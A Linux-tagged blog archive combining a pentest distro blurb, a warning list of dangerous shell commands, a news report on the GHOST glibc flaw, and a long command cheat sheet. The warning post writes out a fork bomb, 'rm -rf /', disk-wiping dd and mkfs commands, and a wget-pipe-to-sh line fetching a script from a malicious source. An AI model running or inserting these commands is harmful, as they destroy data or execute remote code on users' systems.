Posts Tagged ‘linux’

Cyborg Linux, based on Ubuntu, was developed by Team Cyborg, led by Vaibhav Singh and Shahnawaz Alam from Ztrela Knowledge Solutions. Cyborg Hawk has more than 700 tools, the most complete toolset, and can be used for network security and auditing and digital forensics, as well as for mobile security and wireless network security testing. Cyborg Hawk’s interface is also quite beautiful, and it is considered to be the most advanced, powerful and beautiful penetration testing release ever.


  • More than 750 penetration testing tools included.
  • Cyborg Hawk is totally Free and always will be.
  • Can be used as live OS with full capability.
  • Exploitation Toolkit, Stress Testing, Reverse Engineering, Forensics, Mobile Security & Wireless Security.
  • Full virtual machine support in version v1.1.
  • Now comes with its own repository.
  • Reliable and stable.
  • Various Wireless devices support.
  • Well sorted menu, everything organised in a logical manner.
  • The kernel is patched from injection.

Tool Categories

The 750 or so tools are grouped roughly in the menu in the following categories:

  • Information Gathering
  • Vulnerability Assessment
  • Exploitation
  • Privilege Escalation
  • Maintaining Access
  • Documentation & Reporting
  • Reverse Engineering
  • Stress Testing
  • Forensics
  • Wireless Security
  • Hardware Hacking
  • VoIP Analysis
  • Mobile Security
  • Malware Analysis




Linux shell or terminal commands are very powerful, and a single simple command can delete a folder, files or even the root folder. Linux does not ask for confirmation; it executes the command right away, causing you to lose the data and information stored in those files and folders.

Take a look at the 9 commands and codes you should avoid executing.

1. Linux Fork Bomb Command

:(){ :|: & };: also known as a fork bomb, is a denial-of-service attack against a Linux system. :(){ :|: & };: is a bash function. Once executed, it repeats itself multiple times until the system freezes.

To get rid of it you need to restart or reboot your server. So be careful when executing this command in your Linux shell.

2. Mv Folder /Dev/Null Command

mv folder /dev/null is another risky command. /dev/null, or the null device, is a device file that discards all the data written to it but reports that the write operation succeeded. It is also known as the bit bucket or black hole.

3. Rm -Rf Command

The rm -rf command is used to delete a folder and its contents in the Linux operating system. If you don’t know how to use it, then it’s very dangerous to the system. The most common combinations and options used with the rm -rf command are listed below:

  • rm command is used to delete the files in Linux system.
  • rm -f command removes read-only files in folder without prompting.
  • rm -r command deletes the content of a folder recursively.
  • rm -d command is used to remove an empty directory but it will refuse to remove directory if it is not empty.
  • rm -rf / command is used for forced deletion (it deletes it even if it’s write protected) of all the content in the root directory and sub folders.
  • rm -rf * command is used for forced deletion of all the content in the current directory (the directory you are currently working in) and sub folders.
  • rm -rf . command is used for forced deletion of all the content in the current folder and sub folders. The rm -r .[^.]* command can also be used.
  • rm -i command is used for removal of files and folders but a prompt will appear before removal.

4. Mkfs Command

mkfs can be a dangerous command for your Linux based system if you don’t know its purpose. Anything written after the mkfs will be formatted and replaced by a blank Linux file system.

The commands given below will format the hard drive and need administrator privileges:

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat
  • mkfs.cramfs (no need of administrator privileges)

5. Tar Bomb

The tar command is used to combine many files into a single file (an archive file) in .tar format. A Tape Archive (Tar) bomb can be created with this command.

It is an archive file which explodes into thousands or millions of files with names similar to the existing files into the current directory rather than into a new directory when untarred.

To avoid becoming a victim of a tar bomb, create a new protective directory whenever you receive a tar file and move the received tar file into this directory before untarring. If the tar file is indeed a tar bomb then you can simply remove the newly created directory to get rid of it.

Another way to avoid the explosion of a tar bomb is via the -t option to list all of the content of a tar file to give you an idea of the type of content contained within the tar file.
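Both precautions above can be scripted. The following is an added example, not code from the original post: it classifies the output of tar -t and always unpacks inside a freshly created directory. The function names and the sample archives are made up for the illustration.

```shell
#!/bin/sh
# Added example: look at where a tar archive would unpack before extracting it.

# classify_listing: reads member names (the output of `tar -tf`) on stdin and
# prints one verdict:
#   unsafe-path  a member is absolute or contains a ".." component
#   empty        the archive lists no members
#   spills       members land directly in the current directory, or in more
#                than one top-level directory (the tar bomb layout)
#   single-dir   everything sits under one top-level directory
classify_listing() {
    awk -F/ '
        /^\// || /(^|\/)\.\.(\/|$)/ { unsafe = 1 }
        {
            sub(/^\.\//, "")        # "./dir/file" and "dir/file" are the same place
            if ($0 == "") next      # blank line or the "./" entry itself
            if (NF == 1) loose++    # a file with no directory in front of it
            if (!($1 in seen)) { seen[$1] = 1; tops++ }
        }
        END {
            if (unsafe)                     print "unsafe-path"
            else if (tops == 0)             print "empty"
            else if (loose > 0 || tops > 1) print "spills"
            else                            print "single-dir"
        }'
}

# check_tar ARCHIVE: list the archive (nothing is written to disk) and classify it.
check_tar() {
    listing=$(tar -tf "$1" 2>/dev/null) || { echo "unreadable"; return 2; }
    printf '%s\n' "$listing" | classify_listing
}

# extract_contained ARCHIVE: unpack inside a new directory whatever the layout,
# so a bomb can be removed by deleting that one directory. Archives with
# absolute or ".." paths are refused. Prints the directory that was created.
extract_contained() {
    verdict=$(check_tar "$1") || return 2
    if [ "$verdict" = "unsafe-path" ]; then
        echo "refusing $1: unsafe member path" >&2
        return 1
    fi
    dest=$(mktemp -d ./untar.XXXXXX) || return 2
    tar -xf "$1" -C "$dest" && echo "$dest"
}

# Constructed demo: one tidy archive and one that spills into the current
# directory. Runs in a subshell inside a temporary directory, which is left
# behind for inspection.
demo() (
    work=$(mktemp -d) || exit 1
    cd "$work" || exit 1
    mkdir project
    echo a > project/a.txt; echo b > b.txt; echo c > c.txt
    tar -cf tidy.tar project
    tar -cf spill.tar b.txt c.txt project
    echo "tidy.tar:  $(check_tar tidy.tar)"
    echo "spill.tar: $(check_tar spill.tar)"
    echo "spill.tar unpacked inside: $(extract_contained spill.tar)"
)
demo
```
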

6. Dd Command

The dd command is used to copy & convert hard disk partitions. However, it can turn out to be harmful if you specify the wrong destination.

The command may be any one of these:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda
  • dd if=/dev/zero of=/dev/hda (will zero out the whole primary hard drive)

7. Shell Script Code

Someone may victimize you by giving you a link to a shell script and encouraging you to download and execute it. The script may contain malicious or dangerous code. The command may look like this: wget http://some_malicious_source -O- | sh. Here wget downloads the script and sh executes it immediately.

8. Malicious Source Code

Someone gives you source code and asks you to compile it. The code may appear to be normal, but in fact some malicious code is hidden in the large code base and it may harm your system. To avoid being victimized by this kind of attack, only accept and compile source code from trustworthy sources.

9. Decompression Bomb

You have received a compressed file and you are asked to extract it. The file appears to be very small, perhaps only a few KB. In fact, this small compressed file contains very highly compressed data.

Once the file is decompressed, hundreds of GB of data is extracted which can fill up your hard drive to bring down the performance of your system.
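An added example (not from the original post) of checking how far a compressed file expands before extracting it. It assumes the file is gzip-compressed; the function names and the size limits are illustrative.

```shell
#!/bin/sh
# Added example: measure how far a gzip file expands without writing it to disk.
# `gzip -l` is not used because the size it prints comes from a field inside
# the file (stored modulo 2^32), so the sender controls it.

# expanded_size FILE LIMIT
# Decompresses FILE into a pipe and counts at most LIMIT+1 bytes, so a bomb
# costs a bounded amount of work and no disk space. Prints the real size when
# it is within LIMIT, "over-limit" (status 1) when it is not, and "not-gzip"
# (status 2) when the file does not start with the gzip magic bytes 1f 8b.
expanded_size() {
    file=$1
    limit=$2
    magic=$(head -c 2 "$file" 2>/dev/null | od -An -tx1 | tr -d ' \n')
    [ "$magic" = "1f8b" ] || { echo "not-gzip"; return 2; }
    count=$(gzip -dc "$file" 2>/dev/null | head -c "$((limit + 1))" | wc -c | tr -d ' ')
    if [ "$count" -gt "$limit" ]; then
        echo "over-limit"
        return 1
    fi
    echo "$count"
}

# guarded_gunzip FILE.gz LIMIT
# Writes the decompressed file next to the original only when the check passes.
guarded_gunzip() {
    size=$(expanded_size "$1" "$2") || { echo "refused: $size"; return 1; }
    gzip -dc "$1" > "${1%.gz}" && echo "ok: $size bytes"
}

# Constructed demo: 10 MiB of zero bytes shrinks to a few KB when compressed.
demo() (
    work=$(mktemp -d) || exit 1
    head -c 10485760 /dev/zero | gzip -c > "$work/zeros.gz"
    echo "compressed size: $(wc -c < "$work/zeros.gz" | tr -d ' ') bytes"
    echo "with a 1 MiB limit:  $(guarded_gunzip "$work/zeros.gz" 1048576)"
    echo "with a 16 MiB limit: $(guarded_gunzip "$work/zeros.gz" 16777216)"
)
demo
```
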


Ghost in the Machine

Posted: 29/01/2015 in Uncategorized

A newly disclosed flaw opens up most Linux-based Web and mail servers to attack, researchers from Redwood Shores, California-based security firm Qualys disclosed today (Jan. 27).

The flaw, dubbed “GHOST” by its discoverers, “allows attackers to remotely take complete control of the victim system without having any prior knowledge of system credentials,” (i.e. administrative passwords), Qualys staffer Amol Sarwate said in a company blog posting.

“As a proof of concept, we developed a full-fledged remote exploit against the Exim mail server, bypassing all existing protections (ASLR, PIE, and NX) on both 32-bit and 64-bit machines,” Qualys researchers posted on the Openwall security mailing list earlier today.


GHOST is of immediate and urgent concern to any IT professional administering a Linux-based server, but users of desktop Linux should also install patches, which have already been pushed out by Red Hat and Ubuntu, among others. (Red Hat Fedora 20 and later, and Ubuntu 13.10 and later, were already immune.)

Various flavors of Linux power at least a third of the world’s Web servers and mail servers, but it’s likely that administrators at top Web-based companies were tipped off ahead of today’s disclosure.

GHOST, designated CVE-2015-0235 per security-industry convention, is the fourth major vulnerability in open-source software found in the past 10 months. The stampede began with the discovery of the Heartbleed flaw in OpenSSL in April, then continued with the Shellshock hole in the Bash command-line shell in September, followed by the POODLE weakness in Web encryption in October.

Such technical talk may be gobbledygook to most computer users, but arcane open-source software runs the Internet and the Web that rides on top of it. Any major open-source flaw threatens not only the massive global Internet economy, but your ability to check your own Facebook page.

“To be clear, this is NOT the end of the Internet,” wrote Jen Ellis of Boston information-security firm Rapid7 in an official blog posting. “It’s also not another Heartbleed. But it is potentially nasty, and you should patch and reboot your affected systems immediately.”

GHOST vulnerability explained

The flaw exists in older versions of the GNU C library, or glibc, a repository of open-source software written in the C and C++ coding languages. Newer versions of glibc, beginning with glibc 2.18, released in August 2013, are not affected. But many builds of Linux may still be using older versions.

In addition to Exim, server software vulnerable to GHOST includes Apache, Sendmail, Nginx, MySQL, CUPS, Samba and many others, according to a post by Qualys researchers on the Full Disclosure mailing list. CORRECTION: The applications listed on the Full Disclosure page are NOT vulnerable to GHOST.

The risk to users of massively subscribed services such as Twitter, Facebook and all of Google’s online services should be low, presuming that administrators of those companies’ servers have already implemented or are currently implementing patches. (It’s possible that last night’s 40-minute Facebook outage was the result of this.)

But implementation of the patches will have to be manual, which means that millions of websites and mail servers that don’t get the same degree of administrative attention will continue to be vulnerable for an extended period of time.

Thanks to Qualys and Tom’s Guide


When working on an app or code, you may often need some reference material; that’s where cheatsheets become very useful.

Here we present you with an A-Z of cheatsheets that are relevant to programmers and developers. It doesn’t cover all languages or databases, but you’ll find most of what you need. If there’s anything missing, feel free to let us know so we can do better.

1. Asynchronous JavaScript And XML (AJAX): This is a group of interrelated web development techniques that are used to create asynchronous web applications on the client side.

2. Apache: If you’re using the Apache HTTP server then this cheat sheet is just what you would need in front of you.

3. Apache Ant: This java library and command line tool is used for automating software build processes.

4. Apache Cassandra: The open source distributed database management system is often the first pick when scalability is a concern.

5. American Standard Code for Information Interchange (ASCII): The most common character encoding scheme.

6. Berkeley DB: Oracle’s Berkeley DB is a fast and reliable option chosen by many developers.

7. Blueprint: This is a cheatsheet on the popular CSS framework.

8. C: In many ways it is the father of some of the most popular programming languages.

9. C#: A cheatsheet on C# never goes to waste. Most programmers learn the language and a cheatsheet always helps.

10. C++: One of the most useful programming languages ever. It is a must learn language for programmers.

11. Calculus and Analysis: Programmers and developers often need to have a good grasp on calculus and analysis in order to build certain types of apps.

12. Clojure: One of the most popular languages running on the Java Virtual Machine.

13. CSS: Cascading Style Sheets along with HTML is the language of the internet.

14. Debian: A cheatsheet on one of the most popular Linux-based distributions.

15. Django: Written in Python, this is an open source web application framework used by many.

16. DOM – Document Object Model: This is the convention used for interacting with objects in XHTML, XML and HTML.

17. Drupal: The open source content management system is highly popular amongst developers.

18. Eclipse: One of the most popular IDEs, used almost everywhere today.

19. Fedora: One of the big daddies from amongst the Linux-based distributions.

20. Firebug: The web development add-on for Mozilla’s Firefox has turned quite a few heads.

21. Git: It doesn’t matter whether you support open source or not, Git needs no introduction.

22. Groovy: This is another programming language that runs on the Java Virtual Machine.

23. Hadoop: Big Data is the future and hence, so is Hadoop.

24. Haskell: This is an open source functional programming language.

25. HTML: Use the Hypertext Markup Language to create your own website.

26. Java: The inescapable language for programmers and developers.

27. JavaScript: The scripting language for the web.

28. jQuery: A feature rich JavaScript library.

29. Linux: Command line tips that Linux users will find useful.

30. Mac OS X: This is a keyboard cheatsheet for Apple’s Mac OS X users.

31. Mathematica: The Wolfram Mathematica is considered to be a very powerful system.

32. MATLAB: This is a high-level technical computing language and interactive environment.

33. MySQL: Some have been losing faith in MySQL, but the database still goes strong.

34. NMAP: You hackers know what this is don’t you?

35. Node.js: This is the pick of the lot for building scalable web

36. Oracle: This is a reference cheat sheet for Oracle’s SQL.

37. Perl: The popular programming language is used in a variety of places.

38. PHP: Not much needs to be said about PHP.

39. PostgreSQL: This is often used as an alternative for MySQL.

40. Python: One of the most popular programming languages available today. It is used in everything from game programming to hacking.

41. Ruby: Another popular programming platform used by many across the globe.

42. Ruby on Rails: This is an open source framework that runs on Ruby.

43. Scala: This is an object-functional programming and scripting language running on the JVM.

44. Shell script

45. SQL – Structured Query Language: The programming language used to manage data stored in relational database systems.

46. SQLite: This is the relational database management system that is held in a C programming library.

47. Ubuntu: Linux for humans. It may be so, but a cheatsheet is still useful.

48. Unicode: This is the standard for encoding in the world of computers.

49. Unix: A cheatsheet for working on the Unix command line.

50. WordPress: The content management system has grown in popularity over time.

51. XHTML: This is an XML markup language. It stands for Extensible HTML.

52. XML: XML stands for Extensible Markup Language and is used by many.

53. .NET: This framework from Microsoft runs primarily on Windows and there is a debate about whether it is open source or not.



Google Chrome, a browser built on the Blink layout engine that aims to be minimalistic and versatile at the same time, is now at version 31.0.1650.26 Beta.

After the release of a development and stable version, a new Google Chrome Beta is now available, bringing a few much needed changes and improvements.

According to the announcement, a “kiosk_only” manifest attribute has been added for platform apps, a content switch has been added to turn off unprefixed MediaSource API, a wrong policy used for secondary users has been corrected, a tablet layout regression has been corrected, and much more.

A complete list of bug fixes and changes can be found in the official changelog.



Following on from a recent post, ‘Nmap Cheat Sheet’, I have decided to create another cheat sheet, this time for GNU/Linux, as I am constantly referring to it. These kinds of things are very handy: if you are like me and don’t use Linux on a daily basis, they can play a major part in jogging the little grey cells.


CheatSheet commands for GNU / Linux

System Information

1. arch: show the architecture of the machine (1).
2. uname -m: show the architecture of the machine (2).
3. uname -r: show the kernel version used.
4. dmidecode -q: display the hardware components of the system.
5. hdparm -i /dev/hda: show the characteristics of a hard disk.
6. hdparm -tT /dev/sda: run a read test on a hard disk.
7. cat /proc/cpuinfo: show CPU information.
8. cat /proc/interrupts: show interrupts.
9. cat /proc/meminfo: verify memory usage.
10. cat /proc/swaps: show swap files.
11. cat /proc/version: display the version of the kernel.
12. cat /proc/net/dev: display network adapters and statistics.
13. cat /proc/mounts: display the mounted file systems.
14. lspci -tv: show PCI devices.
15. lsusb -tv: show USB devices.
16. date: display the system date.
17. cal 2013: show calendar 2013.
18. cal 07 2013: show the calendar for the month July 2013.
19. date 041217002013.00: set the date and time.
20. clock -w: save changes to the BIOS date.

Shutdown (Reset System or Log out)

1. shutdown -h now: Shut down system (1).
2. init 0: Shut down system (2).
3. telinit 0: Shut down system (3).
4. halt: shutdown the system (4).
5. shutdown -h hours:minutes &: planned shutdown of the system.
6. shutdown -c: cancel a planned shutdown of the system.
7. shutdown -r now: Restart (1).
8. reboot: Reboot (2).
9. logout: close session.

Files and Directories

1. cd /home: enter the “home” directory.
2. cd ..: go back one level.
3. cd ../..: back 2 levels.
4. cd: go to the home directory.
5. cd ~user1: go to the home directory of user1.
6. cd -: go (back) to the previous directory.
7. pwd: show the path of the working directory.
8. ls: see the files in a directory.
9. ls -F: see the files in a directory.
10. ls -l: show details of files and folders in a directory.
11. ls -a: show hidden files.
12. ls *[0-9]*: show the files and folders that contain numbers.
13. tree: display files and folders in a tree starting from the root. (1)
14. lstree: display files and folders in a tree starting from the root. (2)
15. mkdir dir1: create a folder or directory called ‘dir1’.
16. mkdir dir1 dir2: create two folders or directories at once.
17. mkdir -p /tmp/dir1/dir2: create a directory tree.
18. rm -f file1: delete the file called file1.
19. rmdir dir1: delete the folder called dir1.
20. rm -rf dir1: delete a folder called dir1 with its contents recursively.
21. rm -rf dir1 dir2: delete two folders (directories) with their contents recursively.
22. mv dir1 new_dir: rename or move a file or folder (directory).
23. cp file1: copy a file.
24. cp file1 file2: copy file1 to file2.
25. cp dir/* . : copy all the files of a directory into the current working directory.
26. cp -a /tmp/dir1 . : copy a directory within the current working directory.
27. cp -a dir1: copy a directory.
28. cp -a dir1 dir2: copy directory dir1 to dir2.
29. ln -s file1 lnk1: create a symbolic link to the file or directory.
30. ln file1 lnk1: create a hard link to the file or directory.
31. touch -t 0712250000 file1: modify the timestamp of a file or directory (format YYMMDDhhmm).
32. file file1: show the type of a file.
33. iconv -l: list the known character encodings.
34. iconv -f fromEncoding -t toEncoding inputFile > outputFile: create a new file from the input file, converting it from fromEncoding to toEncoding.
35. find . -maxdepth 1 -name "*.jpg" -print -exec convert "{}" -resize 80x60 "thumbs/{}" \;: resize the files in the current directory and write them as thumbnails to the ‘thumbs’ directory (requires convert from ImageMagick).

Finding Files

1. find / -name file1: file and directory search from the root of the system.
2. find / -user user1: find files and directories belonging to user user1.
3. find /home/user1 -name \*.bin: search for files with the extension ‘.bin’ within the directory ‘/home/user1’.
4. find /usr/bin -type f -atime +100: find binary files not used in the last 100 days.
5. find /usr/bin -type f -mtime -10: find files created or changed within the last 10 days.
6. find / -name \*.rpm -exec chmod 755 '{}' \;: look for files with the extension ‘.rpm’ and change their permissions.
7. find / -xdev -name \*.rpm: find files with the extension ‘.rpm’, ignoring removable devices such as cdrom, pen-drive, etc.
8. locate \*.ps: find files with the extension ‘.ps’; run the ‘updatedb’ command first.
9. whereis halt: show the location of a binary file. In this case it asks where the ‘halt’ command is.
10. which halt: show the full path to a binary / executable.

Mounting a file system

1. mount /dev/hda2 /mnt/hda2: mount a disk called hda2. First check that the directory ‘/mnt/hda2’ exists; if not, create it.
2. umount /dev/hda2: unmount a disk called hda2. Leave the mount point ‘/mnt/hda2’ first.
3. fuser -km /mnt/hda2: force umount when the device is busy (kills the processes that are using the mount point).
4. umount -n /mnt/hda2: unmount without writing to the file /etc/mtab. Useful when the file is read-only or the hard drive is full.
5. mount /dev/fd0 /mnt/floppy: mount a floppy disk.
6. mount /dev/cdrom /mnt/cdrom: mount a cdrom / dvdrom.
7. mount /dev/hdc /mnt/cdrecorder: mount a rewritable cd or dvdrom.
8. mount /dev/hdb /mnt/cdrecorder: mount a rewritable cd / dvdrom (a dvd).
9. mount -o loop file.iso /mnt/cdrom: mount a file or iso image.
10. mount -t vfat /dev/hda5 /mnt/hda5: mount a FAT32 file system.
11. mount /dev/sda1 /mnt/usbdisk: mount a USB thumb drive or memory stick (without specifying the filesystem type).

Hard Disk Space

1. df -h: display a list of mounted partitions.
2. ls -lSr |more: show the size of the files and directories sorted by size.
3. du -sh dir1: Estimate the space used by the directory dir1.
4. du -sk * | sort -rn: show the size of the files and directories sorted by size.
5. rpm -q -a --qf '%10{SIZE}\t%{NAME}\n' | sort -k1,1n: show space used by the installed rpm packages organized by size (Fedora, Redhat and others).
6. dpkg-query -W -f='${Installed-Size;10}\t${Package}\n' | sort -k1,1n: show space used by the packages installed, organized by size (Ubuntu, Debian and others).

Users and Groups

1. groupadd name_of_the_group: create a new group.
2. groupdel name_of_the_group: delete a group.
3. groupmod -n new_name_of_the_group old_name_of_the_group: rename a group.
4. useradd -c "Name Surname" -g admin -d /home/user1 -s /bin/bash user1: create a new user belonging to the “admin” group.
5. useradd user1: create a new user.
6. userdel -r user1: delete a user (‘-r’ eliminates home directory).
7. usermod -c "User FTP" -g system -d /ftp/user1 -s /bin/nologin user1: change user attributes.
8. passwd: Changing password.
9. passwd user1: change the password of a user (only root).
10. chage -E 2013-12-31 user1: set a time limit for the user’s password. In this case the password expires on December 31, 2013.
11. pwck: check the syntax and format of the file ‘/etc/passwd’ and the existence of users.
12. grpck: check the syntax and format of the file ‘/etc/group’ and the existence of groups.
13. newgrp group_name: log in to a new group to change the default group of newly created files.

File Permissions (Use “+” to place permissions and “-” to remove)

1. ls -lh: Show permissions.
2. ls /tmp | pr -T5 -W$COLUMNS: show the listing with the terminal divided into 5 columns.
3. chmod ugo+rwx directory1: grant read (r), write (w) and execute (x) permissions to the owner (u), group (g) and others (o) on the directory ‘directory1’.
4. chmod go-rwx directory1: remove read (r), write (w) and execute (x) permissions from the group (g) and others (o) on the directory ‘directory1’.
5. chown user1 file1: change owner of a file.
6. chown -R user1 directory1: change the owner of a directory and all files and directories contained within.
7. chgrp group1 file1: changing group of files.
8. chown user1:group1 file1: change user and group ownership of a file.
9. find / -perm -u+s: display all system files with SUID configured.
10. chmod u+s /bin/file1: set the SUID bit on a binary file. A user running that file gets the same privileges as the owner.
11. chmod u-s /bin/file1: disable SUID bit on a binary file.
12. chmod g+s /home/public: set the SGID bit on a directory; similar to SUID but for directories.
13. chmod g-s /home/public: disable SGID bit on a directory.
14. chmod o+t /home/public: set the sticky bit on a directory. Allows files to be deleted only by their rightful owners.
15. chmod o-t /home/public: disable the sticky bit on a directory.

Special Attributes on files (Use “+” to place permissions and “-” to remove)

1. chattr +a file1: allows a file to be opened for writing only in append mode.
2. chattr +c file1: allows a file to be compressed / decompressed automatically.
3. chattr +d file1: ensures that the program ignores the file during backup.
4. chattr +i file1: make the file immutable, so it cannot be removed, altered, renamed, or linked.
5. chattr +s file1: allows a file to be deleted securely.
6. chattr +S file1: ensures that when a file is modified, the changes are written in synchronous mode, as with sync.
7. chattr +u file1: allows you to restore the contents of a file even if it is deleted.
8. lsattr: show special attributes.

Compressed files

1. bunzip2 file1.bz2: decompress a file called ‘file1.bz2’.
2. bzip2 file1: compress a file called ‘file1’.
3. gunzip file1.gz: decompress a file called ‘file1.gz’.
4. gzip file1: compress a file called ‘file1’.
5. gzip -9 file1: compress with maximum compression.
6. rar a file1.rar test_file: create a rar archive called ‘file1.rar’.
7. rar a file1.rar file1 file2 dir1: compress ‘file1’, ‘file2’ and ‘dir1’ simultaneously.
8. rar x file1.rar: decompress rar file.
9. unrar x file1.rar: decompress rar file.
10. tar -cvf archive.tar file1: create an uncompressed tarball.
11. tar -cvf archive.tar file1 file2 dir1: create an archive containing ‘file1’, ‘file2’ and ‘dir1’.
12. tar -tf archive.tar: show the contents of an archive.
13. tar -xvf archive.tar: extract a tarball.
14. tar -xvf archive.tar -C /tmp: extract a tarball in /tmp.
15. tar -cvjf archive.tar.bz2 dir1: create a tarball compressed with bzip2.
16. tar -xvjf archive.tar.bz2: decompress a bzip2 compressed tar file.
17. tar -cvzf archive.tar.gz dir1: create a gzip tarball.
18. tar -xvzf archive.tar.gz: decompress a gzip compressed tar archive.
19. zip file1.zip file1: create a zip file.
20. zip -r file1.zip file1 file2 dir1: compress in zip several files and directories simultaneously.
21. unzip file1.zip: decompress a zip file.

RPM Packages (Red Hat, Fedora…etc)

1. rpm -ivh package.rpm: install an rpm package.
2. rpm -ivh --nodeps package.rpm: install an rpm package ignoring dependency requests.
3. rpm -U package.rpm: upgrade a rpm package without changing configuration files.
4. rpm -F package.rpm: upgrade a rpm package only if it is installed.
5. rpm -e package_name.rpm: remove a rpm package.
6. rpm -qa: show all rpm packages installed on the system.
7. rpm -qa | grep httpd: show all rpm packages with the name “httpd”.
8. rpm -qi package_name: get information on a specific package installed.
9. rpm -qg “System Environment/Daemons”: show rpm packages of a software group.
10. rpm -ql package_name: show list of files given by a rpm package installed.
11. rpm -qc package_name: show configuration files list given by a rpm package installed.
12. rpm -q package_name --whatrequires: show list of dependencies required for a rpm package.
13. rpm -q package_name --whatprovides: show the capability provided by a rpm package.
14. rpm -q package_name --scripts: show the scripts started during installation / removal.
15. rpm -q package_name --changelog: display the history of revisions of a rpm package.
16. rpm -qf /etc/httpd/conf/httpd.conf: check which rpm package belongs to a given file.
17. rpm -qp package.rpm -l: show list of files given by a rpm package not yet installed.
18. rpm --import /media/cdrom/RPM-GPG-KEY: import digital signature public key.
19. rpm --checksig package.rpm: verify the integrity of a rpm package.
20. rpm -qa gpg-pubkey: list the GPG public keys imported into rpm, which are used to verify package signatures.
21. rpm -V package_name: check the file size, permissions, type, owner, group, MD5 digest and last modification time.
22. rpm -Va: check all rpm packages installed on the system. Use with caution.
23. rpm -Vp package.rpm: verify a rpm package not yet installed.
24. rpm2cpio package.rpm | cpio --extract --make-directories *bin*: extract the executable files from a rpm package.
25. rpm -ivh /usr/src/redhat/RPMS/`arch`/package.rpm: install a package built from a source rpm.
26. rpmbuild --rebuild package_name.src.rpm: build a rpm package from a source rpm.

YUM packages updater (Red Hat, Fedora…etc)

1. yum install package_name: download and install a rpm package.
2. yum localinstall package_name.rpm: This will install an RPM and attempt to resolve all dependencies for you, using your repositories.
3. yum update: update all rpm packages installed on the system.
4. yum update package_name: upgrade a rpm package.
5. yum remove package_name: remove a rpm package.
6. yum list: list all packages installed on the system.
7. yum search package_name: find a package in the rpm repository.
8. yum clean packages: clean the rpm cache, erasing downloaded packages.
9. yum clean headers: remove all header files that the system uses to resolve the dependency.
10. yum clean all: delete from the cache packages and header files.

Deb packages (Debian, Ubuntu…etc)

1. dpkg -i package.deb: install / upgrade a deb package.
2. dpkg -r package_name: remove a deb package.
3. dpkg -l: show all deb packages installed on the system.
4. dpkg -l | grep httpd: show all deb packages with the name “httpd”
5. dpkg -s package_name: to obtain information on a specific package installed on the system.
6. dpkg -L package_name: show list of files given by a package installed on the system.
7. dpkg --contents package.deb: show list of files given by a package not yet installed.
8. dpkg -S /bin/ping: check which package owns a given file.

APT packages updater (Debian, Ubuntu …etc)

1. apt-get install package_name: install / upgrade a deb package.
2. apt-cdrom install package_name: install / upgrade a deb package from cdrom.
3. apt-get update: update the package list.
4. apt-get upgrade: update all installed packages
5. apt-get remove package_name: remove a deb package.
6. apt-get check: check the correct resolution of dependencies.
7. apt-get clean: clean up cache from packages downloaded.
8. apt-cache search searched-package: return the list of packages that match the string “searched-package”.

View the contents of a file

1. cat file1: view the contents of a file starting from the first row.
2. tac file1: view the contents of a file starting from the last line.
3. more file1: view the contents of a long file.
4. less file1: command like ‘more’, but it allows both forward and backward movement in the file.
5. head -2 file1: see the first two lines of a file.
6. tail -2 file1: see the last two lines of a file.
7. tail -f /var/log/messages: see in real time what has been added to the file.

Text Manipulation

1. cat file1 file2 .. | command <> file1_in.txt_or_file1_out.txt: general syntax for text manipulation using PIPE, STDIN and STDOUT.
2. cat file1 | command( sed, grep, awk, grep, etc…) > result.txt: general syntax to manipulate a text from a file and write the output to a new file.
3. cat file1 | command( sed, grep, awk, grep, etc…) >> result.txt: general syntax to manipulate a text from a file and append the result to an existing file.
4. grep Aug /var/log/messages: search for the word “Aug” in the file ‘/var/log/messages’.
5. grep ^Aug /var/log/messages: look for lines that begin with “Aug” in the file ‘/var/log/messages’.
6. grep [0-9] /var/log/messages: select all lines in the file ‘/var/log/messages’ that contain numbers.
7. grep Aug -R /var/log/*: search for the string “Aug” in the directory ‘/var/log’ and below.
8. sed 's/stringa1/stringa2/g' example.txt: replace “stringa1” with “stringa2” in example.txt.
9. sed '/^$/d' example.txt: delete all blank lines from example.txt.
10. sed '/ *#/d; /^$/d' example.txt: remove comments and blank lines from example.txt.
11. echo 'esempio' | tr '[:lower:]' '[:upper:]': convert lowercase to uppercase.
12. sed -e '1d' result.txt: delete the first line of the file result.txt.
13. sed -n '/stringa1/p': display only lines that contain the word “stringa1”.

Character set and file conversion

1. dos2unix filedos.txt fileunix.txt: convert a text file format from MSDOS to UNIX.
2. unix2dos fileunix.txt filedos.txt: convert a text file format from UNIX to MSDOS.
3. recode ..HTML < page.txt > page.html: convert a text file to html.
4. recode -l | more: show all available format conversions.

Analysis of the file systems

1. badblocks -v /dev/hda1: Check for bad blocks on disk hda1.
2. fsck /dev/hda1: repair / check the integrity of a Linux file system on disk hda1.
3. fsck.ext2 /dev/hda1: repair / check the integrity of an ext2 file system on disk hda1.
4. e2fsck /dev/hda1: repair / check the integrity of an ext2 file system on disk hda1.
5. fsck.ext3 /dev/hda1: repair / check the integrity of an ext3 file system on disk hda1.
6. fsck.vfat /dev/hda1: repair / check the integrity of a FAT file system on disk hda1.
7. fsck.msdos /dev/hda1: repair / check the integrity of an MS-DOS file system on disk hda1.
8. dosfsck /dev/hda1: repair / check the integrity of a DOS file system on disk hda1.

Formatting a filesystem

1. mkfs /dev/hda1: create a Linux file system on the partition hda1.
2. mke2fs /dev/hda1: create a Linux ext2 file system on the partition hda1.
3. mke2fs -j /dev/hda1: create a Linux ext3 (journaling) file system on the partition hda1.
4. mkfs -t vfat -F 32 /dev/hda1: create a FAT32 file system on hda1.
5. fdformat -n /dev/fd0: format a floppy disk.
6. mkswap /dev/hda3: create a swap file system.

Working with SWAP

1. mkswap /dev/hda3: create a swap file system.
2. swapon /dev/hda3: activate a new swap partition.
3. swapon /dev/hda2 /dev/hdb3: activate two swap partitions.


Backup

1. dump -0aj -f /tmp/home0.bak /home: make a full backup of the directory ‘/home’.
2. dump -1aj -f /tmp/home0.bak /home: make an incremental backup of the directory ‘/home’.
3. restore -if /tmp/home0.bak: restore a backup interactively.
4. rsync -rogpav --delete /home /tmp: synchronize two directories.
5. rsync -rogpav -e ssh --delete /home ip_address:/tmp: rsync through an SSH tunnel.
6. rsync -az -e ssh --delete ip_addr:/home/public /home/local: synchronize a local directory with a remote directory via ssh and compression.
7. rsync -az -e ssh --delete /home/local ip_addr:/home/public: synchronize a remote directory with a local directory via ssh and compression.
